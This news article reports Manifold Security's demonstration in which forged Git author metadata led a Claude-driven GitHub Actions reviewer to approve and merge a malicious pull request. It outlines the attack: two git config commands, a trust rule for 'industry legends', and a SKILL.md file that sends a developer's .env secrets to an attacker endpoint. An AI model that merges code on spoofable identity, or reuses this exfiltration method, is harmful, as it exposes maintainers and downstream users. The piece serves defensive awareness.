TL;DR
- Exploit: Manifold Security showed that spoofed Git author metadata could convince a Claude-powered workflow to approve malicious code.
- Root Cause: GitHub documentation shows unsigned author strings are not verified identity and should not drive trust decisions.
- Why It Matters: Any GitHub Actions coding agent with broad permissions can inherit the same risk when approvals bypass human oversight.
Manifold Security this week shared how Anthropic’s Claude approved a malicious pull request after a workflow treated unsigned Git author metadata as proof that the change came from a trusted maintainer. For teams relying on AI review bots to keep pull requests moving, the demonstration turned a routine trust shortcut into a direct path for hostile code.
That warning reaches beyond one lab setup. In the same trusted developer identity report, Manifold said the workflow accepted and merged the pull request and that a GitHub search found more than 12,400 public workflow files referencing claude-code-action, suggesting the pattern is already widely copied.
Anthropic’s Claude Code GitHub Actions docs show the product is built for real repository workflows that analyze code, open pull requests, implement features, and fix bugs from GitHub events. No public Anthropic response or mitigation statement appeared in the sourced material.
How the Spoof Worked
In Manifold’s test, the workflow was configured to trust recognized industry figures, then used two git config commands to impersonate a well-known AI researcher.
According to the report, that trust rule was explicit enough to auto-approve pull requests from a “recognized industry legend.” From there, the Claude-driven review flow treated the forged author as legitimate, was instructed to run gh pr review --approve and gh pr merge, and auto-approved the malicious pull request.
Disguised as a normal helper file, the malicious SKILL.md file in .vscode was designed to read a developer’s .env file and send it to an attacker-controlled Cloudflare Worker endpoint.
Manifold summarized the low-effort setup this way:
“We spoofed the identity of a well-known AI researcher using two git config commands. No credentials, no exploit, no complex tooling. Just a known feature of how Git handles authorship, now weaponized against AI code reviewers.”
Manifold Security, Security researchers (via Manifold Security)
Rather than exposing a Git flaw, the exploit showed what happens when repository automation promotes self-declared authorship into a security control and gives an AI reviewer merge authority on that basis.
Why Git Metadata Is Not Identity Proof
Manifold framed the incident as not a Git vulnerability. In real review pipelines, maintainers may use org membership, past contributions, or maintainer lists to reduce pull request bottlenecks, but those shortcuts still do not prove who authored a change.
GitHub’s guidance says unsigned commits carry no verification status, reserving Verified and Partially verified labels for cryptographically checkable signatures. GitHub also lets administrators require signed commits on protected branches so unsigned changes cannot pass as trusted provenance.
Git’s signing controls exist precisely to verify provenance separately from whatever author string a commit declares. As Manifold put it, “That’s it. No credential theft. No account compromise. Git trusts whatever you tell it.”
For maintainers, the dangerous shortcut sits outside the model. Once repository policy lets a spoofable author string stand in for identity, an AI reviewer can follow instructions perfectly and still approve bad code.
Why the Risk Extends Beyond One Claude Workflow
Manifold points out that coding agents in GitHub Actions, including Claude Code, Copilot, Gemini CLI, and Codex, share the same structural exposure when unsigned author identity becomes a trust rule.
Anthropic’s workflow guidance says the manual setup can grant read and write permissions for contents, issues, and pull requests while also telling users to review suggestions before merging.
GitHub’s hardening guidance makes the broader policy risk explicit:
“Allowing workflows, or any other automation, to create or approve pull requests could be a security risk if the pull request is merged without proper oversight.”
GitHub Docs, Secure use reference (via GitHub Docs)
That warning also fits adjacent coverage of a GitHub Action secrets breach last year, where the risk was secret exposure rather than a false review approval but the dependence on GitHub Actions trust was similar.
For maintainers already leaning on automation to handle pull request volume, the next step is immediate: audit those trust rules before the next AI-assisted merge. If unsigned author strings still carry approval power, one forged name can expose developer secrets, slip malicious code into shared dependencies, and leave downstream users absorbing the damage before a human reviewer catches it.

